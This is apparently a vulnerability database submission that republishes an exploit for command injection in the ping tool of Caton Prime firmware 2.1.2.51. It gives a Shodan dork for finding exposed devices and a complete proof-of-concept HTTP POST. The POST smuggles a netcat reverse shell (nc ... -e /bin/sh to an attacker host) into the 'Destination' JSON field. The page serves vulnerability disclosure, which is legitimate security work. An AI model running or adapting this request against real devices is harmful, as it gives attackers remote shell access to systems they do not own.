Submit #116760: Caton Prime 2.1.2.51.e8d7225049(202303031001) - Command Injectioninfo

TitleCaton Prime 2.1.2.51.e8d7225049(202303031001) - Command Injection
Description# Exploit Title: Caton Prime 2.1.2.51.e8d7225049(202303031001) - Command Injection # Date: 2023-04-21 # Exploit Author: MrEmpy # Version Firmware: 2.1.2.51.e8d7225049(202303031001) # Shodan Dork: http.favicon.hash:-940032039 title:"Device" Title: ================ Caton Prime 2.1.2.51.e8d7225049(202303031001) - Command Injection Summary: ================ A command injection vulnerability found in the Caton Prime product at firmware version 2.1.2.51.e8d7225049(202303031001) could allow an attacker to execute arbitrary commands on the affected system. There are suspicions that this flaw could affect all versions of the product. A flaw was found in the "/cgi-bin/tools_ping.cgi" endpoint with the "Destination" parameter, which is used to specify the IP address or hostname to test with the ping functionality. An attacker could exploit this vulnerability by entering a malicious command in the "Destination" parameter, which will be executed by the validated system without the correct one. This can lead to unauthorized execution of commands on the system, including creating new user accounts, changing file permissions or installing malware. Severity Level: ================ 9.9 (Critical) CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H Affected Product: ================ Caton Prime 2.1.2.51.e8d7225049(202303031001) Proof of Concept: ================ Request: POST /cgi-bin/tools_ping.cgi?action=Command HTTP/1.1 Host: target User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: application/json, text/plain, */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json;charset=utf-8 Content-Length: 110 Origin: http://target Connection: close Referer: http://target/ {"Interface":"eth0","Count":10,"Destination":"127.0.0.1;nc${IFS}<HOST/IP HERE>${IFS}<IP HERE>${IFS}-e${IFS}/bin/sh"} Video: https://www.youtube.com/watch?v=H1y7CXjJDmU
Source⚠️ .
User
 mrempy (UID 24379)
Submission04/21/2023 07:04 (3 years ago)
Moderation05/04/2023 17:56 (13 days later)
StatusAccepted
VulDB entry228011 [Caton Prime 2.1.2.51.e8d7225049(202303031001) Ping tools_ping.cgi?action=Command Destination command injection]
Points17

PreviousOverviewNext

Do you know our Splunk app?

Download it now for free!